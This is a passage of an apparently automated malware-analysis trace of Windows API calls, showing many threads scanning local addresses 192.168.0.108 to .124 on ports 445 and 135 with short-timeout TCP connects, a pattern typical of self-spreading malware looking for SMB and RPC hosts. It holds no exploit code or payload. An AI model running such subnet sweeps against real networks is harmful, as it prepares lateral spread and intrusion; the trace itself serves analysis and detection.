closesocket (s=0xd2c) returned 0 [0101.727] RtlExitUserThread (Status=0x0) Thread: id = 188 os_tid = 0xcdc [0091.492] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073070 [0091.492] free (_Block=0x2073070) [0091.492] inet_addr (cp="192.168.0.124") returned 0x7c00a8c0 [0091.492] htons (hostshort=0x1bd) returned 0xbd01 [0091.492] socket (af=2, type=1, protocol=6) returned 0xd38 [0091.493] ioctlsocket (in: s=0xd38, cmd=-2147195266, argp=0xe0aff34 | out: argp=0xe0aff34) returned 0 [0091.493] connect (s=0xd38, name=0xe0aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.124"), namelen=16) returned -1 [0091.493] WSAGetLastError () returned 10035 [0091.493] select (in: nfds=0, readfds=0x0, writefds=0xe0afd08, exceptfds=0xe0afe10, timeout=0xe0aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xe0afd08, exceptfds=0xe0afe10) returned 0 [0096.542] closesocket (s=0xd38) returned 0 [0096.542] inet_addr (cp="192.168.0.124") returned 0x7c00a8c0 [0096.542] htons (hostshort=0x87) returned 0x8700 [0096.542] socket (af=2, type=1, protocol=6) returned 0xd38 [0096.542] ioctlsocket (in: s=0xd38, cmd=-2147195266, argp=0xe0aff34 | out: argp=0xe0aff34) returned 0 [0096.542] connect (s=0xd38, name=0xe0aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.124"), namelen=16) returned -1 [0096.543] WSAGetLastError () returned 10035 [0096.543] select (in: nfds=0, readfds=0x0, writefds=0xe0afd08, exceptfds=0xe0afe10, timeout=0xe0aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xe0afd08, exceptfds=0xe0afe10) returned 0 [0101.728] closesocket (s=0xd38) returned 0 [0101.729] RtlExitUserThread (Status=0x0) Thread: id = 189 os_tid = 0xce0 [0091.494] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073048 [0091.494] free (_Block=0x2073048) [0091.494] inet_addr (cp="192.168.0.123") returned 0x7b00a8c0 [0091.494] htons (hostshort=0x1bd) returned 0xbd01 [0091.494] socket (af=2, type=1, protocol=6) returned 0xd44 [0091.494] ioctlsocket (in: s=0xd44, cmd=-2147195266, argp=0xe1eff34 | out: argp=0xe1eff34) returned 0 [0091.494] connect (s=0xd44, name=0xe1eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.123"), namelen=16) returned -1 [0091.495] WSAGetLastError () returned 10035 [0091.495] select (in: nfds=0, readfds=0x0, writefds=0xe1efd08, exceptfds=0xe1efe10, timeout=0xe1eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xe1efd08, exceptfds=0xe1efe10) returned 0 [0096.540] closesocket (s=0xd44) returned 0 [0096.541] inet_addr (cp="192.168.0.123") returned 0x7b00a8c0 [0096.541] htons (hostshort=0x87) returned 0x8700 [0096.541] socket (af=2, type=1, protocol=6) returned 0xd44 [0096.541] ioctlsocket (in: s=0xd44, cmd=-2147195266, argp=0xe1eff34 | out: argp=0xe1eff34) returned 0 [0096.541] connect (s=0xd44, name=0xe1eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.123"), namelen=16) returned -1 [0096.541] WSAGetLastError () returned 10035 [0096.541] select (in: nfds=0, readfds=0x0, writefds=0xe1efd08, exceptfds=0xe1efe10, timeout=0xe1eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xe1efd08, exceptfds=0xe1efe10) returned 0 [0101.730] closesocket (s=0xd44) returned 0 [0101.731] RtlExitUserThread (Status=0x0) Thread: id = 190 os_tid = 0xce4 [0091.495] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073020 [0091.495] free (_Block=0x2073020) [0091.495] inet_addr (cp="192.168.0.122") returned 0x7a00a8c0 [0091.495] htons (hostshort=0x1bd) returned 0xbd01 [0091.495] socket (af=2, type=1, protocol=6) returned 0xd50 [0091.496] ioctlsocket (in: s=0xd50, cmd=-2147195266, argp=0xe32ff34 | out: argp=0xe32ff34) returned 0 [0091.496] connect (s=0xd50, name=0xe32ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.122"), namelen=16) returned -1 [0091.496] WSAGetLastError () returned 10035 [0091.496] select (in: nfds=0, readfds=0x0, writefds=0xe32fd08, exceptfds=0xe32fe10, timeout=0xe32ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xe32fd08, exceptfds=0xe32fe10) returned 0 [0096.538] closesocket (s=0xd50) returned 0 [0096.539] inet_addr (cp="192.168.0.122") returned 0x7a00a8c0 [0096.539] htons (hostshort=0x87) returned 0x8700 [0096.539] socket (af=2, type=1, protocol=6) returned 0xd50 [0096.540] ioctlsocket (in: s=0xd50, cmd=-2147195266, argp=0xe32ff34 | out: argp=0xe32ff34) returned 0 [0096.540] connect (s=0xd50, name=0xe32ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.122"), namelen=16) returned -1 [0096.540] WSAGetLastError () returned 10035 [0096.540] select (in: nfds=0, readfds=0x0, writefds=0xe32fd08, exceptfds=0xe32fe10, timeout=0xe32ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xe32fd08, exceptfds=0xe32fe10) returned 0 [0101.732] closesocket (s=0xd50) returned 0 [0101.733] RtlExitUserThread (Status=0x0) Thread: id = 191 os_tid = 0xce8 [0091.497] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072ff8 [0091.497] free (_Block=0x2072ff8) [0091.497] inet_addr (cp="192.168.0.121") returned 0x7900a8c0 [0091.497] htons (hostshort=0x1bd) returned 0xbd01 [0091.497] socket (af=2, type=1, protocol=6) returned 0xd5c [0091.497] ioctlsocket (in: s=0xd5c, cmd=-2147195266, argp=0xe46ff34 | out: argp=0xe46ff34) returned 0 [0091.497] connect (s=0xd5c, name=0xe46ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.121"), namelen=16) returned -1 [0091.498] WSAGetLastError () returned 10035 [0091.498] select (in: nfds=0, readfds=0x0, writefds=0xe46fd08, exceptfds=0xe46fe10, timeout=0xe46ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xe46fd08, exceptfds=0xe46fe10) returned 0 [0096.537] closesocket (s=0xd5c) returned 0 [0096.537] inet_addr (cp="192.168.0.121") returned 0x7900a8c0 [0096.537] htons (hostshort=0x87) returned 0x8700 [0096.537] socket (af=2, type=1, protocol=6) returned 0xd5c [0096.538] ioctlsocket (in: s=0xd5c, cmd=-2147195266, argp=0xe46ff34 | out: argp=0xe46ff34) returned 0 [0096.538] connect (s=0xd5c, name=0xe46ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.121"), namelen=16) returned -1 [0096.538] WSAGetLastError () returned 10035 [0096.538] select (in: nfds=0, readfds=0x0, writefds=0xe46fd08, exceptfds=0xe46fe10, timeout=0xe46ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xe46fd08, exceptfds=0xe46fe10) returned 0 [0101.697] closesocket (s=0xd5c) returned 0 [0101.698] RtlExitUserThread (Status=0x0) Thread: id = 192 os_tid = 0xcec [0091.498] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072fd0 [0091.498] free (_Block=0x2072fd0) [0091.498] inet_addr (cp="192.168.0.120") returned 0x7800a8c0 [0091.498] htons (hostshort=0x1bd) returned 0xbd01 [0091.498] socket (af=2, type=1, protocol=6) returned 0xd68 [0091.498] ioctlsocket (in: s=0xd68, cmd=-2147195266, argp=0xe5aff34 | out: argp=0xe5aff34) returned 0 [0091.499] connect (s=0xd68, name=0xe5aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.120"), namelen=16) returned -1 [0091.499] WSAGetLastError () returned 10035 [0091.499] select (in: nfds=0, readfds=0x0, writefds=0xe5afd08, exceptfds=0xe5afe10, timeout=0xe5aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xe5afd08, exceptfds=0xe5afe10) returned 0 [0096.535] closesocket (s=0xd68) returned 0 [0096.536] inet_addr (cp="192.168.0.120") returned 0x7800a8c0 [0096.536] htons (hostshort=0x87) returned 0x8700 [0096.536] socket (af=2, type=1, protocol=6) returned 0xd68 [0096.536] ioctlsocket (in: s=0xd68, cmd=-2147195266, argp=0xe5aff34 | out: argp=0xe5aff34) returned 0 [0096.536] connect (s=0xd68, name=0xe5aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.120"), namelen=16) returned -1 [0096.537] WSAGetLastError () returned 10035 [0096.537] select (in: nfds=0, readfds=0x0, writefds=0xe5afd08, exceptfds=0xe5afe10, timeout=0xe5aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xe5afd08, exceptfds=0xe5afe10) returned 0 [0101.699] closesocket (s=0xd68) returned 0 [0101.700] RtlExitUserThread (Status=0x0) Thread: id = 193 os_tid = 0xcf0 [0091.499] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072fa8 [0091.500] free (_Block=0x2072fa8) [0091.500] inet_addr (cp="192.168.0.119") returned 0x7700a8c0 [0091.500] htons (hostshort=0x1bd) returned 0xbd01 [0091.500] socket (af=2, type=1, protocol=6) returned 0xd74 [0091.503] ioctlsocket (in: s=0xd74, cmd=-2147195266, argp=0xe6eff34 | out: argp=0xe6eff34) returned 0 [0091.503] connect (s=0xd74, name=0xe6eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.119"), namelen=16) returned -1 [0091.503] WSAGetLastError () returned 10035 [0091.503] select (in: nfds=0, readfds=0x0, writefds=0xe6efd08, exceptfds=0xe6efe10, timeout=0xe6eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xe6efd08, exceptfds=0xe6efe10) returned 0 [0096.566] closesocket (s=0xd74) returned 0 [0096.567] inet_addr (cp="192.168.0.119") returned 0x7700a8c0 [0096.567] htons (hostshort=0x87) returned 0x8700 [0096.567] socket (af=2, type=1, protocol=6) returned 0xd74 [0096.567] ioctlsocket (in: s=0xd74, cmd=-2147195266, argp=0xe6eff34 | out: argp=0xe6eff34) returned 0 [0096.567] connect (s=0xd74, name=0xe6eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.119"), namelen=16) returned -1 [0096.567] WSAGetLastError () returned 10035 [0096.567] select (in: nfds=0, readfds=0x0, writefds=0xe6efd08, exceptfds=0xe6efe10, timeout=0xe6eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xe6efd08, exceptfds=0xe6efe10) returned 0 [0101.736] closesocket (s=0xd74) returned 0 [0101.736] RtlExitUserThread (Status=0x0) Thread: id = 194 os_tid = 0xcf4 [0091.504] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072f80 [0091.504] free (_Block=0x2072f80) [0091.504] inet_addr (cp="192.168.0.118") returned 0x7600a8c0 [0091.504] htons (hostshort=0x1bd) returned 0xbd01 [0091.504] socket (af=2, type=1, protocol=6) returned 0xd80 [0091.504] ioctlsocket (in: s=0xd80, cmd=-2147195266, argp=0xe82ff34 | out: argp=0xe82ff34) returned 0 [0091.504] connect (s=0xd80, name=0xe82ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.118"), namelen=16) returned -1 [0091.505] WSAGetLastError () returned 10035 [0091.505] select (in: nfds=0, readfds=0x0, writefds=0xe82fd08, exceptfds=0xe82fe10, timeout=0xe82ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xe82fd08, exceptfds=0xe82fe10) returned 0 [0096.558] closesocket (s=0xd80) returned 0 [0096.558] inet_addr (cp="192.168.0.118") returned 0x7600a8c0 [0096.558] htons (hostshort=0x87) returned 0x8700 [0096.558] socket (af=2, type=1, protocol=6) returned 0xd80 [0096.559] ioctlsocket (in: s=0xd80, cmd=-2147195266, argp=0xe82ff34 | out: argp=0xe82ff34) returned 0 [0096.559] connect (s=0xd80, name=0xe82ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.118"), namelen=16) returned -1 [0096.559] WSAGetLastError () returned 10035 [0096.559] select (in: nfds=0, readfds=0x0, writefds=0xe82fd08, exceptfds=0xe82fe10, timeout=0xe82ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xe82fd08, exceptfds=0xe82fe10) returned 0 [0101.737] closesocket (s=0xd80) returned 0 [0101.738] RtlExitUserThread (Status=0x0) Thread: id = 195 os_tid = 0xcf8 [0091.505] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072f58 [0091.505] free (_Block=0x2072f58) [0091.505] inet_addr (cp="192.168.0.117") returned 0x7500a8c0 [0091.505] htons (hostshort=0x1bd) returned 0xbd01 [0091.505] socket (af=2, type=1, protocol=6) returned 0xd8c [0091.506] ioctlsocket (in: s=0xd8c, cmd=-2147195266, argp=0xe96ff34 | out: argp=0xe96ff34) returned 0 [0091.506] connect (s=0xd8c, name=0xe96ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.117"), namelen=16) returned -1 [0091.506] WSAGetLastError () returned 10035 [0091.506] select (in: nfds=0, readfds=0x0, writefds=0xe96fd08, exceptfds=0xe96fe10, timeout=0xe96ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xe96fd08, exceptfds=0xe96fe10) returned 0 [0096.556] closesocket (s=0xd8c) returned 0 [0096.557] inet_addr (cp="192.168.0.117") returned 0x7500a8c0 [0096.557] htons (hostshort=0x87) returned 0x8700 [0096.557] socket (af=2, type=1, protocol=6) returned 0xd8c [0096.557] ioctlsocket (in: s=0xd8c, cmd=-2147195266, argp=0xe96ff34 | out: argp=0xe96ff34) returned 0 [0096.557] connect (s=0xd8c, name=0xe96ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.117"), namelen=16) returned -1 [0096.558] WSAGetLastError () returned 10035 [0096.558] select (in: nfds=0, readfds=0x0, writefds=0xe96fd08, exceptfds=0xe96fe10, timeout=0xe96ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xe96fd08, exceptfds=0xe96fe10) returned 0 [0101.739] closesocket (s=0xd8c) returned 0 [0101.740] RtlExitUserThread (Status=0x0) Thread: id = 196 os_tid = 0xcfc [0091.507] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072f00 [0091.507] free (_Block=0x2072f00) [0091.507] inet_addr (cp="192.168.0.116") returned 0x7400a8c0 [0091.507] htons (hostshort=0x1bd) returned 0xbd01 [0091.507] socket (af=2, type=1, protocol=6) returned 0xd98 [0091.507] ioctlsocket (in: s=0xd98, cmd=-2147195266, argp=0xeaaff34 | out: argp=0xeaaff34) returned 0 [0091.507] connect (s=0xd98, name=0xeaaff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.116"), namelen=16) returned -1 [0091.508] WSAGetLastError () returned 10035 [0091.508] select (in: nfds=0, readfds=0x0, writefds=0xeaafd08, exceptfds=0xeaafe10, timeout=0xeaaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xeaafd08, exceptfds=0xeaafe10) returned 0 [0096.554] closesocket (s=0xd98) returned 0 [0096.556] inet_addr (cp="192.168.0.116") returned 0x7400a8c0 [0096.556] htons (hostshort=0x87) returned 0x8700 [0096.556] socket (af=2, type=1, protocol=6) returned 0xd98 [0096.556] ioctlsocket (in: s=0xd98, cmd=-2147195266, argp=0xeaaff34 | out: argp=0xeaaff34) returned 0 [0096.556] connect (s=0xd98, name=0xeaaff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.116"), namelen=16) returned -1 [0096.556] WSAGetLastError () returned 10035 [0096.556] select (in: nfds=0, readfds=0x0, writefds=0xeaafd08, exceptfds=0xeaafe10, timeout=0xeaaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xeaafd08, exceptfds=0xeaafe10) returned 0 [0101.741] closesocket (s=0xd98) returned 0 [0101.741] RtlExitUserThread (Status=0x0) Thread: id = 197 os_tid = 0xd00 [0091.508] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072ed8 [0091.508] free (_Block=0x2072ed8) [0091.508] inet_addr (cp="192.168.0.115") returned 0x7300a8c0 [0091.508] htons (hostshort=0x1bd) returned 0xbd01 [0091.508] socket (af=2, type=1, protocol=6) returned 0xda4 [0091.508] ioctlsocket (in: s=0xda4, cmd=-2147195266, argp=0xebeff34 | out: argp=0xebeff34) returned 0 [0091.508] connect (s=0xda4, name=0xebeff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.115"), namelen=16) returned -1 [0091.509] WSAGetLastError () returned 10035 [0091.509] select (in: nfds=0, readfds=0x0, writefds=0xebefd08, exceptfds=0xebefe10, timeout=0xebeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xebefd08, exceptfds=0xebefe10) returned 0 [0096.553] closesocket (s=0xda4) returned 0 [0096.553] inet_addr (cp="192.168.0.115") returned 0x7300a8c0 [0096.553] htons (hostshort=0x87) returned 0x8700 [0096.553] socket (af=2, type=1, protocol=6) returned 0xda4 [0096.554] ioctlsocket (in: s=0xda4, cmd=-2147195266, argp=0xebeff34 | out: argp=0xebeff34) returned 0 [0096.554] connect (s=0xda4, name=0xebeff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.115"), namelen=16) returned -1 [0096.554] WSAGetLastError () returned 10035 [0096.554] select (in: nfds=0, readfds=0x0, writefds=0xebefd08, exceptfds=0xebefe10, timeout=0xebeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xebefd08, exceptfds=0xebefe10) returned 0 [0101.715] closesocket (s=0xda4) returned 0 [0101.716] RtlExitUserThread (Status=0x0) Thread: id = 198 os_tid = 0xd04 [0091.509] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072eb0 [0091.509] free (_Block=0x2072eb0) [0091.510] inet_addr (cp="192.168.0.114") returned 0x7200a8c0 [0091.510] htons (hostshort=0x1bd) returned 0xbd01 [0091.510] socket (af=2, type=1, protocol=6) returned 0xdb0 [0091.510] ioctlsocket (in: s=0xdb0, cmd=-2147195266, argp=0xed2ff34 | out: argp=0xed2ff34) returned 0 [0091.510] connect (s=0xdb0, name=0xed2ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.114"), namelen=16) returned -1 [0091.510] WSAGetLastError () returned 10035 [0091.511] select (in: nfds=0, readfds=0x0, writefds=0xed2fd08, exceptfds=0xed2fe10, timeout=0xed2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xed2fd08, exceptfds=0xed2fe10) returned 0 [0096.551] closesocket (s=0xdb0) returned 0 [0096.552] inet_addr (cp="192.168.0.114") returned 0x7200a8c0 [0096.552] htons (hostshort=0x87) returned 0x8700 [0096.552] socket (af=2, type=1, protocol=6) returned 0xdb0 [0096.552] ioctlsocket (in: s=0xdb0, cmd=-2147195266, argp=0xed2ff34 | out: argp=0xed2ff34) returned 0 [0096.552] connect (s=0xdb0, name=0xed2ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.114"), namelen=16) returned -1 [0096.553] WSAGetLastError () returned 10035 [0096.553] select (in: nfds=0, readfds=0x0, writefds=0xed2fd08, exceptfds=0xed2fe10, timeout=0xed2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xed2fd08, exceptfds=0xed2fe10) returned 0 [0101.716] closesocket (s=0xdb0) returned 0 [0101.717] RtlExitUserThread (Status=0x0) Thread: id = 199 os_tid = 0xd08 [0091.511] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072e88 [0091.511] free (_Block=0x2072e88) [0091.511] inet_addr (cp="192.168.0.113") returned 0x7100a8c0 [0091.511] htons (hostshort=0x1bd) returned 0xbd01 [0091.511] socket (af=2, type=1, protocol=6) returned 0xdbc [0091.511] ioctlsocket (in: s=0xdbc, cmd=-2147195266, argp=0xee6ff34 | out: argp=0xee6ff34) returned 0 [0091.511] connect (s=0xdbc, name=0xee6ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.113"), namelen=16) returned -1 [0091.512] WSAGetLastError () returned 10035 [0091.512] select (in: nfds=0, readfds=0x0, writefds=0xee6fd08, exceptfds=0xee6fe10, timeout=0xee6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xee6fd08, exceptfds=0xee6fe10) returned 0 [0096.550] closesocket (s=0xdbc) returned 0 [0096.551] inet_addr (cp="192.168.0.113") returned 0x7100a8c0 [0096.551] htons (hostshort=0x87) returned 0x8700 [0096.551] socket (af=2, type=1, protocol=6) returned 0xdbc [0096.551] ioctlsocket (in: s=0xdbc, cmd=-2147195266, argp=0xee6ff34 | out: argp=0xee6ff34) returned 0 [0096.551] connect (s=0xdbc, name=0xee6ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.113"), namelen=16) returned -1 [0096.551] WSAGetLastError () returned 10035 [0096.551] select (in: nfds=0, readfds=0x0, writefds=0xee6fd08, exceptfds=0xee6fe10, timeout=0xee6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xee6fd08, exceptfds=0xee6fe10) returned 0 [0101.718] closesocket (s=0xdbc) returned 0 [0101.719] RtlExitUserThread (Status=0x0) Thread: id = 200 os_tid = 0xd0c [0091.512] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072e60 [0091.512] free (_Block=0x2072e60) [0091.512] inet_addr (cp="192.168.0.112") returned 0x7000a8c0 [0091.512] htons (hostshort=0x1bd) returned 0xbd01 [0091.512] socket (af=2, type=1, protocol=6) returned 0xdc8 [0091.513] ioctlsocket (in: s=0xdc8, cmd=-2147195266, argp=0xefaff34 | out: argp=0xefaff34) returned 0 [0091.513] connect (s=0xdc8, name=0xefaff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.112"), namelen=16) returned -1 [0091.513] WSAGetLastError () returned 10035 [0091.513] select (in: nfds=0, readfds=0x0, writefds=0xefafd08, exceptfds=0xefafe10, timeout=0xefaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xefafd08, exceptfds=0xefafe10) returned 0 [0096.549] closesocket (s=0xdc8) returned 0 [0096.549] inet_addr (cp="192.168.0.112") returned 0x7000a8c0 [0096.549] htons (hostshort=0x87) returned 0x8700 [0096.549] socket (af=2, type=1, protocol=6) returned 0xdc8 [0096.549] ioctlsocket (in: s=0xdc8, cmd=-2147195266, argp=0xefaff34 | out: argp=0xefaff34) returned 0 [0096.550] connect (s=0xdc8, name=0xefaff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.112"), namelen=16) returned -1 [0096.550] WSAGetLastError () returned 10035 [0096.550] select (in: nfds=0, readfds=0x0, writefds=0xefafd08, exceptfds=0xefafe10, timeout=0xefaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xefafd08, exceptfds=0xefafe10) returned 0 [0101.720] closesocket (s=0xdc8) returned 0 [0101.721] RtlExitUserThread (Status=0x0) Thread: id = 201 os_tid = 0xd10 [0091.514] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072e38 [0091.514] free (_Block=0x2072e38) [0091.514] inet_addr (cp="192.168.0.111") returned 0x6f00a8c0 [0091.514] htons (hostshort=0x1bd) returned 0xbd01 [0091.514] socket (af=2, type=1, protocol=6) returned 0xdd4 [0091.514] ioctlsocket (in: s=0xdd4, cmd=-2147195266, argp=0xf0eff34 | out: argp=0xf0eff34) returned 0 [0091.514] connect (s=0xdd4, name=0xf0eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.111"), namelen=16) returned -1 [0091.515] WSAGetLastError () returned 10035 [0091.515] select (in: nfds=0, readfds=0x0, writefds=0xf0efd08, exceptfds=0xf0efe10, timeout=0xf0eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xf0efd08, exceptfds=0xf0efe10) returned 0 [0096.547] closesocket (s=0xdd4) returned 0 [0096.548] inet_addr (cp="192.168.0.111") returned 0x6f00a8c0 [0096.548] htons (hostshort=0x87) returned 0x8700 [0096.548] socket (af=2, type=1, protocol=6) returned 0xdd4 [0096.548] ioctlsocket (in: s=0xdd4, cmd=-2147195266, argp=0xf0eff34 | out: argp=0xf0eff34) returned 0 [0096.548] connect (s=0xdd4, name=0xf0eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.111"), namelen=16) returned -1 [0096.548] WSAGetLastError () returned 10035 [0096.549] select (in: nfds=0, readfds=0x0, writefds=0xf0efd08, exceptfds=0xf0efe10, timeout=0xf0eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xf0efd08, exceptfds=0xf0efe10) returned 0 [0101.722] closesocket (s=0xdd4) returned 0 [0101.722] RtlExitUserThread (Status=0x0) Thread: id = 202 os_tid = 0xd14 [0091.515] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072e10 [0091.515] free (_Block=0x2072e10) [0091.515] inet_addr (cp="192.168.0.110") returned 0x6e00a8c0 [0091.515] htons (hostshort=0x1bd) returned 0xbd01 [0091.515] socket (af=2, type=1, protocol=6) returned 0xde0 [0091.517] ioctlsocket (in: s=0xde0, cmd=-2147195266, argp=0xf22ff34 | out: argp=0xf22ff34) returned 0 [0091.517] connect (s=0xde0, name=0xf22ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.110"), namelen=16) returned -1 [0091.519] WSAGetLastError () returned 10035 [0091.519] select (in: nfds=0, readfds=0x0, writefds=0xf22fd08, exceptfds=0xf22fe10, timeout=0xf22ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xf22fd08, exceptfds=0xf22fe10) returned 0 [0096.577] closesocket (s=0xde0) returned 0 [0096.578] inet_addr (cp="192.168.0.110") returned 0x6e00a8c0 [0096.578] htons (hostshort=0x87) returned 0x8700 [0096.578] socket (af=2, type=1, protocol=6) returned 0xde0 [0096.578] ioctlsocket (in: s=0xde0, cmd=-2147195266, argp=0xf22ff34 | out: argp=0xf22ff34) returned 0 [0096.578] connect (s=0xde0, name=0xf22ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.110"), namelen=16) returned -1 [0096.578] WSAGetLastError () returned 10035 [0096.578] select (in: nfds=0, readfds=0x0, writefds=0xf22fd08, exceptfds=0xf22fe10, timeout=0xf22ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xf22fd08, exceptfds=0xf22fe10) returned 0 [0101.759] closesocket (s=0xde0) returned 0 [0101.760] RtlExitUserThread (Status=0x0) Thread: id = 203 os_tid = 0xd18 [0091.520] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072de8 [0091.520] free (_Block=0x2072de8) [0091.520] inet_addr (cp="192.168.0.109") returned 0x6d00a8c0 [0091.520] htons (hostshort=0x1bd) returned 0xbd01 [0091.520] socket (af=2, type=1, protocol=6) returned 0xdec [0091.520] ioctlsocket (in: s=0xdec, cmd=-2147195266, argp=0xf36ff34 | out: argp=0xf36ff34) returned 0 [0091.520] connect (s=0xdec, name=0xf36ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.109"), namelen=16) returned -1 [0091.521] WSAGetLastError () returned 10035 [0091.521] select (in: nfds=0, readfds=0x0, writefds=0xf36fd08, exceptfds=0xf36fe10, timeout=0xf36ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xf36fd08, exceptfds=0xf36fe10) returned 0 [0096.576] closesocket (s=0xdec) returned 0 [0096.576] inet_addr (cp="192.168.0.109") returned 0x6d00a8c0 [0096.576] htons (hostshort=0x87) returned 0x8700 [0096.576] socket (af=2, type=1, protocol=6) returned 0xdec [0096.577] ioctlsocket (in: s=0xdec, cmd=-2147195266, argp=0xf36ff34 | out: argp=0xf36ff34) returned 0 [0096.577] connect (s=0xdec, name=0xf36ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.109"), namelen=16) returned -1 [0096.577] WSAGetLastError () returned 10035 [0096.577] select (in: nfds=0, readfds=0x0, writefds=0xf36fd08, exceptfds=0xf36fe10, timeout=0xf36ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xf36fd08, exceptfds=0xf36fe10) returned 0 [0101.761] closesocket (s=0xdec) returned 0 [0101.762] RtlExitUserThread (Status=0x0) Thread: id = 204 os_tid = 0xd1c [0091.521] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072dc0 [0091.521] free (_Block=0x2072dc0) [0091.521] inet_addr (cp="192.168.0.108") returned 0x6c00a8c0 [0091.521] htons (hostshort=0x1bd) returned 0xbd01 [0091.521] socket (af=2, type=1, protocol=6) returned 0xdf8 [0091.522] ioctlsocket (in: s=0xdf8, cmd=-2147195266, argp=0xf4aff34 | out: argp=0xf4aff34) returned 0 [0091.522] connect (s=0xdf8, name=0xf4aff1c*(sa_family=2, 